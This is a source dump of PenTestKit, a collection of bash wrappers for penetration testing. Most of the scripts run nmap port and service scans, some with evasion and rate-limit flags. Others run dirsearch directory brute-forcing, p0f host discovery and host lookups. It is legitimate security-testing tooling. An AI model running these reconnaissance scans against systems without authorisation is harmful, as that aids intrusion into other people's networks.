-sS -vv -A --osscan-guess --version-all -Pn --top-ports 1000 --open -oA tcp_services_1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -n -Pn -vv -p- --reason --open -oA udp_ports_full_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/services/udp-services-scan-top1000-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -vv -A --osscan-guess --version-all -Pn --top-ports 1000 --open -oA udp_services_1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/services/udp-services-scan-top400-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -vv -A --osscan-guess --version-all -Pn --top-ports 400 --open -oA udp_services_400_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top1000-maxrate-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sS -vv --top-ports 1000 --reason --open --max-rate $2 -oA tcp_ports_1000_maxrate_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the max rate." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top1000-maxrate.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sS -vv --top-ports 1000 -Pn --reason --open --max-rate $2 -oA tcp_ports_1000_maxrate_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the max rate." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -n -Pn -vv -p- --reason --open -T4 -oA udp_ports_full_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /grep/grep-list-hosts-and-open-ports-to-matrix.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | 26 | egrep -v "^#|Status: Up" $1/*.gnmap|cut -d' ' -f2,4-| sed 's/Ignored.*//g' | awk '{printf $1 ";" NF-1 ";"; $1=""; for(i=2; i<=NF; i++) { a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%s(%s),", v[1], v[5]}; a=""; printf "\n"; }' 27 | 28 | else 29 | echo "Please provide a directory path." 30 | fi 31 | -------------------------------------------------------------------------------- /misc/print-top-udp-ports.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -oX - -sU --top-ports $1 2>/dev/null | grep 'services=' | sed 's/||g' 32 | else 33 | echo "Please provide number of ports." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/services/tcp-ports-services-scan-top400-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sS -sV -vv -O --osscan-guess --version-all -Pn --top-ports 400 --open -T4 -oA tcp_services_400_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top1000-slow-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sS -n -Pn -vv --top-ports 1000 --reason --open --host-timeout 30m --scan-delay 1s -oA tcp_ports_1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top1000-suprt-fast-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2023 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sS -n -Pn -vv --top-ports 1000 --open --reason -T4 --defeat-rst-ratelimit -oA tcp_ports_1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/services/udp-services-scan-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sU -vv -A --osscan-guess --version-all -Pn -p$2 -oA udp_services_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/services/tcp-services-scan-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2021 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sS -vv -A --osscan-guess --version-all -Pn -p$2 -oA tcp_services_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/udp-ports-scan-top1000-super-fast-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -n -Pn -vv --top-ports 1000 --reason --open --defeat-icmp-ratelimit -T4 -oA udp_ports_top1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /web/dir-scanner-dirsearch-big.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | LOGNAME="dirsearch_$1" 27 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g') 28 | LOGNAME="$LOGNAME.txt" 29 | dirsearch -b -u $1 -t 16 -r -E -f -w /usr/share/seclists/Discovery/Web-Content/big.txt --plain-text-report=$LOGNAME 30 | else 31 | echo "Please provide the target URL." 32 | fi 33 | -------------------------------------------------------------------------------- /port-scanning/udp/services/udp-services-fast-scan-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sU -vv -A --osscan-guess --version-all -Pn -p$2 -T4 -oA udp_services_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the open UDP ports separated by comma." 34 | fi 35 | -------------------------------------------------------------------------------- /reconnaissance/hostname.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | LOGNAME="ip_hostname_$1" 27 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g') 28 | LOGNAME="$LOGNAME.txt" 29 | echo -n "$1 " 30 | nslookup $1 | grep 'name' | cut -f2 | sed 's/name = //' | sed ':a;N;$!ba;s/\n/ /g' | tee -a $LOGNAME 31 | echo 32 | else 33 | echo "Please provide the target IP address." 34 | fi 35 | -------------------------------------------------------------------------------- /web/dir-scanner-dirsearch-medium.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | LOGNAME="dirsearch_$1" 27 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g') 28 | LOGNAME="$LOGNAME.txt" 29 | dirsearch -b -u $1 -t 16 -r -E -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --plain-text-report=$LOGNAME 30 | else 31 | echo "Please provide the URL." 32 | fi 33 | -------------------------------------------------------------------------------- /live-hosts/discover-local-live-hosts-passively-p0f.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2019 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | 26 | if [[ $EUID -ne 0 ]]; then 27 | echo "For better results, please run this script as root." 1>&2 28 | exit 1 29 | fi 30 | 31 | if [ $# -eq 1 ]; then 32 | LOGNAME="local_live_hosts_p0f_$1.txt" 33 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g') 34 | p0f -i $1 > $LOGNAME 35 | else 36 | echo "Please provide your network device." 37 | fi 38 | 39 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-delay-sequential.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 2 ]; then 30 | nmap -sS -vv -r -p- --reason --open --scan-delay $2 -oA tcp_ports_full_delay_sequential_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range and the scan delay time(seconds)." 33 | fi 34 | -------------------------------------------------------------------------------- /port-scanning/tcp/services/tcp-services-fast-scan-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2023 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 2 ]; then 31 | nmap -sS -vv -A --osscan-guess --version-all -Pn -p$2 -T4 -oA tcp_services_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma." 34 | fi 35 | -------------------------------------------------------------------------------- /web/curl-get.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | # e.g. $1 == Accept header 26 | # e.g. $2 == Auth Cookie header 27 | # e.g. $3 == proxy (http://127.0.0.1:8080) 28 | # e.g. $4 == target url 29 | 30 | if [ $# -eq 4 ]; then 31 | curl -X GET --header "$1" --header 'Accept-Language: en' --header "$2" -x "$3" --insecure --include "$4" 32 | else 33 | echo "Please provide Accept header, authorization cookie, proxy server and target url." 34 | fi 35 | -------------------------------------------------------------------------------- /grep/grep-list-hosts-and-open-ports-to-txt.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | 26 | egrep -v "^#|Status: Up" $1/*.gnmap|cut -d' ' -f2,4-| sed 's/Ignored.*//g' | awk '{printf "Host: " $1 "\nOpen ports: " NF-1 "\n"; $1=""; for(i=2; i<=NF; i++) { a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%s\t%s\n", v[1], v[5]}; a=""; printf "\n"; }' 27 | 28 | else 29 | echo "Please provide a directory path." 30 | fi 31 | -------------------------------------------------------------------------------- /live-hosts/discover-local-live-hosts-netbios.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2019 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 